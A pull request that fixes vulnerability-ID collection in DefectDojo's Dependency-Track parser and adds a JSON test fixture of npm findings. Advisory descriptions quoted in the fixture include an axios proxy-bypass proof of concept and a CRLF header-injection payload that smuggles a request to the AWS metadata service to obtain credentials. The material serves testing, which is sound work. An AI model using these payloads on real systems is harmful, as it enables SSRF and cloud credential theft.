### PR TITLE
Fix Dependency Track parser missing vulnerability IDs when aliases is empty

### DIFF
--- a/dojo/tools/dependency_track/parser.py
+++ b/dojo/tools/dependency_track/parser.py
@@ -13,106 +13,6 @@ logger = logging.getLogger(__name__)
 
 class DependencyTrackParser:
 
-    r"""
-    A class that can be used to parse the JSON Finding Packaging Format (FPF) export from OWASP Dependency Track.
-
-    See here for more info on this JSON format: https://docs.dependencytrack.org/integrations/file-formats/
-
-    A typical Finding Packaging Format (FPF) export looks like the following:
-
-    {
-      "version": "1.3",
-      "meta" : {
-        "application": "Dependency-Track",
-        "version": "4.5.0",
-        "timestamp": "2022-02-18T23:31:42Z",
-        "baseUrl": "http://dtrack.example.org"
-      },
-      "project" : {
-        "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
-        "name": "Acme Example",
-        "version": "1.0",
-        "description": "A sample application"
-      },
-      "findings" : [
-      {
-        "component": {
-          "uuid": "b815b581-fec1-4374-a871-68862a8f8d52",
-          "name": "timespan",
-          "version": "2.3.0",
-          "purl": "pkg:npm/timespan@2.3.0",
-          "latestVersion": "3.2.0"
-        },
-        "vulnerability": {
-          "uuid": "115b80bb-46c4-41d1-9f10-8a175d4abb46",
-          "source": "NPM",
-          "vulnId": "533",
-          "title": "Regular Expression Denial of Service",
-          "subtitle": "timespan",
-          "severity": "LOW",
-          "severityRank": 3,
-          "cvssV2Vector": "CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P",
-          "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-          "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
-          "references": "* [https://example.com](https://example.com)\n* [https://example.org](https://example.org)",
-          "published": "2025-07-11 03:16:03.563",
-          "cweId": 400,
-          "cweName": "Uncontrolled Resource Consumption ('Resource Exhaustion')",
-          "cwes": [
-            {
-              "cweId": 400,
-              "name": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
-            }
-          ],
-          "description": "Affected versions of `timespan`...",
-          "recommendation": "No direct patch is available..."
-        },
-        "analysis": {
-          "state": "NOT_SET",
-          "isSuppressed": false
-        },
-        "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:b815b581-fec1-4374-a871-68862a8f8d52:115b80bb-46c4-41d1-9f10-8a175d4abb46"
-      },
-      {
-        "component": {
-          "uuid": "979f87f5-eaf5-4095-9d38-cde17bf9228e",
-          "name": "uglify-js",
-          "version": "2.4.24",
-          "purl": "pkg:npm/uglify-js@2.4.24"
-        },
-        "vulnerability": {
-          "uuid": "701a3953-666b-4b7a-96ca-e1e6a3e1def3",
-          "source": "NPM",
-          "vulnId": "48",
-          "aliases": [
-            {
-              "cveId": "CVE-2022-2053",
-              "ghsaId": "GHSA-95rf-557x-44g5"
-            }
-          ],
-          "title": "Regular Expression Denial of Service",
-          "subtitle": "uglify-js",
-          "severity": "LOW",
-          "severityRank": 3,
-          "cweId": 400,
-          "cweName": "Uncontrolled Resource Consumption ('Resource Exhaustion')",
-          "cwes": [
-            {
-              "cweId": 400,
-              "name": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
-            }
-          ],
-          "description": "Versions of `uglify-js` prior to...",
-          "recommendation": "Update to version 2.6.0 or later."
-        },
-        "analysis": {
-          "isSuppressed": false
-        },
-        "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:979f87f5-eaf5-4095-9d38-cde17bf9228e:701a3953-666b-4b7a-96ca-e1e6a3e1def3"
-      }]
-    }
-    """
-
     def _convert_dependency_track_severity_to_dojo_severity(self, dependency_track_severity):
         """
         Converts a Dependency Track severity to a DefectDojo severity.
@@ -171,23 +71,14 @@ class DependencyTrackParser:
 
         title = f"{component_name}:{version_description} affected by: {vuln_id} ({source})"
 
-        # We should collect all the vulnerability ids, the FPF format can add additional IDs as aliases
-        # we add these aliases in the vulnerability_id list making sure duplicate findings get correctly deduplicated
-        # older version of Dependency-track might not include these field therefore lets check first
-        if dependency_track_finding["vulnerability"].get("aliases"):
-            # There can be multiple alias entries
-            set_of_ids = set()
-            set_of_sources = {"cveId", "sonatypeId", "ghsaId", "osvId", "snykId", "gsdId", "vulnDbId"}
-            for alias in dependency_track_finding["vulnerability"]["aliases"]:
-                for source in set_of_sources:
-                    if source in alias:
-                        set_of_ids.add(alias[source])
-            vulnerability_id = list(set_of_ids)
-        else:
-            # The vulnId is not always a CVE (e.g. if the vulnerability is not from the NVD source)
-            # So here we set the cve for the DefectDojo finding to null unless the source of the
-            # Dependency Track vulnerability is NVD
-            vulnerability_id = [vuln_id] if source is not None and source.upper() == "NVD" else None
+        # Collect all vulnerability IDs: vulnId itself plus any aliases
+        set_of_ids = {vuln_id}
+        set_of_alias_sources = {"cveId", "sonatypeId", "ghsaId", "osvId", "snykId", "gsdId", "vulnDbId"}
+        for alias in dependency_track_finding["vulnerability"].get("aliases") or []:
+            for alias_source in set_of_alias_sources:
+                if alias_source in alias:
+                    set_of_ids.add(alias[alias_source])
+        vulnerability_id = list(set_of_ids)
 
         # Default CWE to CWE-1035 Using Components with Known Vulnerabilities if there is no CWE
         if "cweId" in dependency_track_finding["vulnerability"] and dependency_track_finding["vulnerability"]["cweId"] is not None:

--- a/unittests/scans/dependency_track/deptrack_npm_4.14.1.json
+++ b/unittests/scans/dependency_track/deptrack_npm_4.14.1.json
@@ -1,0 +1,1062 @@
+{
+    "meta": {
+        "baseUrl": "http://dtrack.example.org",
+        "application": "Dependency-Track",
+        "version": "4.14.1",
+        "timestamp": "2026-04-24T19:39:49Z"
+    },
+    "findings": [
+        {
+            "component": {
+                "name": "brace-expansion",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/brace-expansion@2.0.3",
+                "uuid": "15771e87-9e7f-4931-a704-315662572101",
+                "version": "2.0.3",
+                "latestVersion": "5.0.5"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-07 23:55:09.748"
+            },
+            "vulnerability": {
+                "severity": "CRITICAL",
+                "vulnId": "CVE-2026-25547",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-7h2j-956f-4vf2",
+                        "cveId": "CVE-2026-25547"
+                    }
+                ],
+                "references": "* [https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2](https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2)",
+                "cvssV4Score": 9.2,
+                "cweId": 1333,
+                "description": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.",
+                "epssScore": 0.0002,
+                "source": "NVD",
+                "published": "2026-02-04 22:16:00.813",
+                "cwes": [
+                    {
+                        "cweId": 1333,
+                        "name": "Inefficient Regular Expression Complexity"
+                    }
+                ],
+                "uuid": "07997273-7f39-4b42-8785-0b24fcad85cb",
+                "severityRank": 0,
+                "cweName": "Inefficient Regular Expression Complexity",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
+                "epssPercentile": 0.05566
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:15771e87-9e7f-4931-a704-315662572101:07997273-7f39-4b42-8785-0b24fcad85cb",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "brace-expansion",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/brace-expansion@1.1.13",
+                "uuid": "21eba8f2-7ac0-445f-a834-bfee3f27b77c",
+                "version": "1.1.13",
+                "latestVersion": "5.0.5"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-07 23:55:12.577"
+            },
+            "vulnerability": {
+                "severity": "CRITICAL",
+                "vulnId": "CVE-2026-25547",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-7h2j-956f-4vf2",
+                        "cveId": "CVE-2026-25547"
+                    }
+                ],
+                "references": "* [https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2](https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2)",
+                "cvssV4Score": 9.2,
+                "cweId": 1333,
+                "description": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.",
+                "epssScore": 0.0002,
+                "source": "NVD",
+                "published": "2026-02-04 22:16:00.813",
+                "cwes": [
+                    {
+                        "cweId": 1333,
+                        "name": "Inefficient Regular Expression Complexity"
+                    }
+                ],
+                "uuid": "07997273-7f39-4b42-8785-0b24fcad85cb",
+                "severityRank": 0,
+                "cweName": "Inefficient Regular Expression Complexity",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
+                "epssPercentile": 0.05566
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:21eba8f2-7ac0-445f-a834-bfee3f27b77c:07997273-7f39-4b42-8785-0b24fcad85cb",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "axios",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/axios@1.13.6",
+                "uuid": "4589322c-61b1-49bf-b38f-9a92cf588681",
+                "version": "1.13.6",
+                "latestVersion": "1.15.2"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-09 23:55:24.846"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 4.8,
+                "vulnId": "GHSA-3p68-rc4w-qgx5",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-3p68-rc4w-qgx5",
+                        "cveId": "CVE-2025-62718"
+                    }
+                ],
+                "references": "* [https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5](https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5)\n* [https://nvd.nist.gov/vuln/detail/CVE-2025-62718](https://nvd.nist.gov/vuln/detail/CVE-2025-62718)\n* [https://github.com/axios/axios/pull/10661](https://github.com/axios/axios/pull/10661)\n* [https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df](https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df)\n* [https://datatracker.ietf.org/doc/html/rfc1034#section-3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1)\n* [https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2)\n* [https://github.com/axios/axios/releases/tag/v1.15.0](https://github.com/axios/axios/releases/tag/v1.15.0)\n* [https://github.com/axios/axios/pull/10688](https://github.com/axios/axios/pull/10688)\n* [https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c](https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c)\n* [https://github.com/axios/axios/releases/tag/v0.31.0](https://github.com/axios/axios/releases/tag/v0.31.0)\n* [https://github.com/advisories/GHSA-3p68-rc4w-qgx5](https://github.com/advisories/GHSA-3p68-rc4w-qgx5)",
+                "cvssV4Score": 6.3,
+                "cweId": 441,
+                "description": "Axios does not correctly handle hostname normalization when checking `NO_PROXY` rules.\nRequests to loopback addresses like `localhost.` (with a trailing dot) or `[::1]` (IPv6 literal) skip `NO_PROXY` matching and go through the configured proxy.\n\nThis goes against what developers expect and lets attackers force requests through a proxy, even if `NO_PROXY` is set up to protect loopback or internal services.\n\nAccording to [RFC 1034 §3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1) and [RFC 3986 §3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2), a hostname can have a trailing dot to show it is a fully qualified domain name (FQDN). At the DNS level, `localhost.` is the same as `localhost`. \nHowever, Axios does a literal string comparison instead of normalizing hostnames before checking `NO_PROXY`. This causes requests like `http://localhost.:8080/` and `http://[::1]:8080/` to be incorrectly proxied.\n\nThis issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections.\n\n---\n\n**PoC**\n\n```js\nimport http from \"http\";\nimport axios from \"axios\";\n\nconst proxyPort = 5300;\n\nhttp.createServer((req, res) => {\n  console.log(\"[PROXY] Got:\", req.method, req.url, \"Host:\", req.headers.host);\n  res.writeHead(200, { \"Content-Type\": \"text/plain\" });\n  res.end(\"proxied\");\n}).listen(proxyPort, () => console.log(\"Proxy\", proxyPort));\n\nprocess.env.HTTP_PROXY = `http://127.0.0.1:${proxyPort}`;\nprocess.env.NO_PROXY = \"localhost,127.0.0.1,::1\";\n\nasync function test(url) {\n  try {\n    await axios.get(url, { timeout: 2000 });\n  } catch {}\n}\n\nsetTimeout(async () => {\n  console.log(\"\\n[*] Testing http://localhost.:8080/\");\n  await test(\"http://localhost.:8080/\"); // goes through proxy\n\n  console.log(\"\\n[*] Testing http://[::1]:8080/\");\n  await test(\"http://[::1]:8080/\"); // goes through proxy\n}, 500);\n```\n\n**Expected:** Requests bypass the proxy (direct to loopback).\n**Actual:** Proxy logs requests for `localhost.` and `[::1]`.\n\n---\n\n**Impact**\n\n* Applications that rely on `NO_PROXY=localhost,127.0.0.1,::1` for protecting loopback/internal access are vulnerable.\n* Attackers controlling request URLs can:\n\n  * Force Axios to send local traffic through an attacker-controlled proxy.\n  * Bypass SSRF mitigations relying on NO\\_PROXY rules.\n  * Potentially exfiltrate sensitive responses from internal services via the proxy.\n  \n  \n---\n\n**Affected Versions**\n\n* Confirmed on Axios **1.12.2** (latest at time of testing).\n* affects all versions that rely on Axios\u2019 current `NO_PROXY` evaluation.\n\n---\n\n**Remediation**\nAxios should normalize hostnames before evaluating `NO_PROXY`, including:\n\n* Strip trailing dots from hostnames (per RFC 3986).\n* Normalize IPv6 literals by removing brackets for matching.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
+                "epssScore": 0.00034,
+                "source": "GITHUB",
+                "published": "2026-04-09 17:32:19.0",
+                "title": "Axios has a NO_PROXY Hostname Normalization Bypass that Leads to SSRF",
+                "cwes": [
+                    {
+                        "cweId": 441,
+                        "name": "Unintended Proxy or Intermediary ('Confused Deputy')"
+                    },
+                    {
+                        "cweId": 918,
+                        "name": "Server-Side Request Forgery (SSRF)"
+                    }
+                ],
+                "uuid": "2e7ae170-4d94-43c4-bb2b-b7baf24c2148",
+                "severityRank": 2,
+                "cweName": "Unintended Proxy or Intermediary ('Confused Deputy')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
+                "epssPercentile": 0.09709
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:4589322c-61b1-49bf-b38f-9a92cf588681:2e7ae170-4d94-43c4-bb2b-b7baf24c2148",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "axios",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/axios@1.13.6",
+                "uuid": "4589322c-61b1-49bf-b38f-9a92cf588681",
+                "version": "1.13.6",
+                "latestVersion": "1.15.2"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-10 12:06:59.235"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 9.9,
+                "vulnId": "CVE-2025-62718",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-3p68-rc4w-qgx5",
+                        "cveId": "CVE-2025-62718"
+                    }
+                ],
+                "references": "* [https://datatracker.ietf.org/doc/html/rfc1034#section-3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1)\n* [https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2)\n* [https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c](https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c)\n* [https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df](https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df)\n* [https://github.com/axios/axios/pull/10661](https://github.com/axios/axios/pull/10661)\n* [https://github.com/axios/axios/pull/10688](https://github.com/axios/axios/pull/10688)\n* [https://github.com/axios/axios/releases/tag/v0.31.0](https://github.com/axios/axios/releases/tag/v0.31.0)\n* [https://github.com/axios/axios/releases/tag/v1.15.0](https://github.com/axios/axios/releases/tag/v1.15.0)\n* [https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5](https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5)",
+                "cvssV4Score": 6.3,
+                "cweId": 441,
+                "description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
+                "epssScore": 0.00035,
+                "source": "NVD",
+                "published": "2026-04-09 15:16:08.65",
+                "cwes": [
+                    {
+                        "cweId": 441,
+                        "name": "Unintended Proxy or Intermediary ('Confused Deputy')"
+                    },
+                    {
+                        "cweId": 918,
+                        "name": "Server-Side Request Forgery (SSRF)"
+                    }
+                ],
+                "uuid": "7a287e6d-2df0-47a7-974d-81d49e533223",
+                "severityRank": 2,
+                "cweName": "Unintended Proxy or Intermediary ('Confused Deputy')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
+                "epssPercentile": 0.10437
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:4589322c-61b1-49bf-b38f-9a92cf588681:7a287e6d-2df0-47a7-974d-81d49e533223",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "next",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/next@16.2.1",
+                "uuid": "06396b4a-576c-43b0-bb8d-62f4f07c0be5",
+                "version": "16.2.1",
+                "latestVersion": "16.2.4"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-10 23:55:15.494"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 7.5,
+                "vulnId": "GHSA-q4gf-8mx6-v5v3",
+                "aliases": [],
+                "references": "* [https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3](https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3)\n* [https://vercel.com/changelog/summary-of-cve-2026-23869](https://vercel.com/changelog/summary-of-cve-2026-23869)\n* [https://github.com/advisories/GHSA-q4gf-8mx6-v5v3](https://github.com/advisories/GHSA-q4gf-8mx6-v5v3)",
+                "cweId": 770,
+                "description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+                "source": "GITHUB",
+                "published": "2026-04-10 15:35:47.0",
+                "title": "Next.js has a Denial of Service with Server Components",
+                "cwes": [
+                    {
+                        "cweId": 770,
+                        "name": "Allocation of Resources Without Limits or Throttling"
+                    }
+                ],
+                "uuid": "37113a35-749a-461e-97bd-1c509feb4814",
+                "severityRank": 1,
+                "cweName": "Allocation of Resources Without Limits or Throttling"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:06396b4a-576c-43b0-bb8d-62f4f07c0be5:37113a35-749a-461e-97bd-1c509feb4814",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "axios",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/axios@1.13.6",
+                "uuid": "4589322c-61b1-49bf-b38f-9a92cf588681",
+                "version": "1.13.6",
+                "latestVersion": "1.15.2"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-10 23:55:16.727"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 4.8,
+                "vulnId": "GHSA-fvcv-3m26-pcqx",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-fvcv-3m26-pcqx",
+                        "cveId": "CVE-2026-40175"
+                    }
+                ],
+                "references": "* [https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx](https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx)\n* [https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1](https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1)\n* [https://github.com/axios/axios/releases/tag/v1.15.0](https://github.com/axios/axios/releases/tag/v1.15.0)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-40175](https://nvd.nist.gov/vuln/detail/CVE-2026-40175)\n* [https://github.com/axios/axios/pull/10660](https://github.com/axios/axios/pull/10660)\n* [https://github.com/axios/axios/pull/10660#issuecomment-4224168081](https://github.com/axios/axios/pull/10660#issuecomment-4224168081)\n* [https://github.com/axios/axios/pull/10688](https://github.com/axios/axios/pull/10688)\n* [https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c](https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c)\n* [https://github.com/axios/axios/releases/tag/v0.31.0](https://github.com/axios/axios/releases/tag/v0.31.0)\n* [https://github.com/advisories/GHSA-fvcv-3m26-pcqx](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)",
+                "cweId": 113,
+                "description": "# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n\n## Summary\nThe Axios library is vulnerable to a specific \"Gadget\" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).\n\nWhile Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.\n\n**Severity**: Critical (CVSS 9.9)\n**Affected Versions**: All versions (v0.x - v1.x)\n**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)\n\n## Usage of \"Helper\" Vulnerabilities\nThis vulnerability is unique because it requires **Zero Direct User Input**.\nIf an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.\n\nBecause Axios does not sanitise these merged header values for CRLF (`\\r\\n`) characters, the polluted property becomes a **Request Smuggling** payload.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\nImagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:\n```javascript\nObject.prototype['x-amz-target'] = \"dummy\\r\\n\\r\\nPUT /latest/api/token HTTP/1.1\\r\\nHost: 169.254.169.254\\r\\nX-aws-ec2-metadata-token-ttl-seconds: 21600\\r\\n\\r\\nGET /ignore\";\n```\n\n### 2. The Gadget Trigger (Safe Code)\nThe application makes a completely safe, hardcoded request:\n```javascript\n// This looks safe to the developer\nawait axios.get('https://analytics.internal/pings'); \n```\n\n### 3. The Execution\nAxios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.\n\n**Resulting HTTP traffic:**\n```http\nGET /pings HTTP/1.1\nHost: analytics.internal\nx-amz-target: dummy\n\nPUT /latest/api/token HTTP/1.1\nHost: 169.254.169.254\nX-aws-ec2-metadata-token-ttl-seconds: 21600\n\nGET /ignore HTTP/1.1\n...\n```\n\n### 4. The Impact (IMDSv2 Bypass)\nThe \"Smuggled\" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).\nThe Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.\n\n## Impact Analysis\n-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).\n-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.\n-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.\n\n## Recommended Fix\nValidate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.\n\n**Patch Suggestion:**\n```javascript\n// In lib/adapters/http.js\nutils.forEach(requestHeaders, function setRequestHeader(val, key) {\n  if (/[\\r\\n]/.test(val)) {\n    throw new Error('Security: Header value contains invalid characters');\n  }\n  // ... proceed to set header\n});\n```\n\n## References\n-   **OWASP**: CRLF Injection (CWE-113)\n\nThis report was generated as part of a security audit of the Axios library.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
+                "epssScore": 0.00403,
+                "source": "GITHUB",
+                "published": "2026-04-10 19:47:16.0",
+                "title": "Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain",
+                "cwes": [
+                    {
+                        "cweId": 113,
+                        "name": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"
+                    },
+                    {
+                        "cweId": 444,
+                        "name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"
+                    },
+                    {
+                        "cweId": 918,
+                        "name": "Server-Side Request Forgery (SSRF)"
+                    }
+                ],
+                "uuid": "4186850a-7d0b-4f16-8e09-6fed5fea5264",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')",
+                "epssPercentile": 0.60949
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:4589322c-61b1-49bf-b38f-9a92cf588681:4186850a-7d0b-4f16-8e09-6fed5fea5264",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "next-intl",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/next-intl@4.8.3",
+                "uuid": "1a0ff72f-8ce5-4d27-ba9e-89e4e8ee11ba",
+                "version": "4.8.3",
+                "latestVersion": "4.9.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-10 23:55:18.598"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-8f24-v5vv-gm5j",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-8f24-v5vv-gm5j",
+                        "cveId": "CVE-2026-40299"
+                    }
+                ],
+                "references": "* [https://github.com/amannn/next-intl/security/advisories/GHSA-8f24-v5vv-gm5j](https://github.com/amannn/next-intl/security/advisories/GHSA-8f24-v5vv-gm5j)\n* [https://github.com/amannn/next-intl/pull/2304](https://github.com/amannn/next-intl/pull/2304)\n* [https://github.com/amannn/next-intl/commit/1c80b668aa6d853f470319eec10a3f61e78a70e6](https://github.com/amannn/next-intl/commit/1c80b668aa6d853f470319eec10a3f61e78a70e6)\n* [https://github.com/amannn/next-intl/releases/tag/v4.9.1](https://github.com/amannn/next-intl/releases/tag/v4.9.1)\n* [https://github.com/advisories/GHSA-8f24-v5vv-gm5j](https://github.com/advisories/GHSA-8f24-v5vv-gm5j)",
+                "cvssV4Score": 6.9,
+                "cweId": 601,
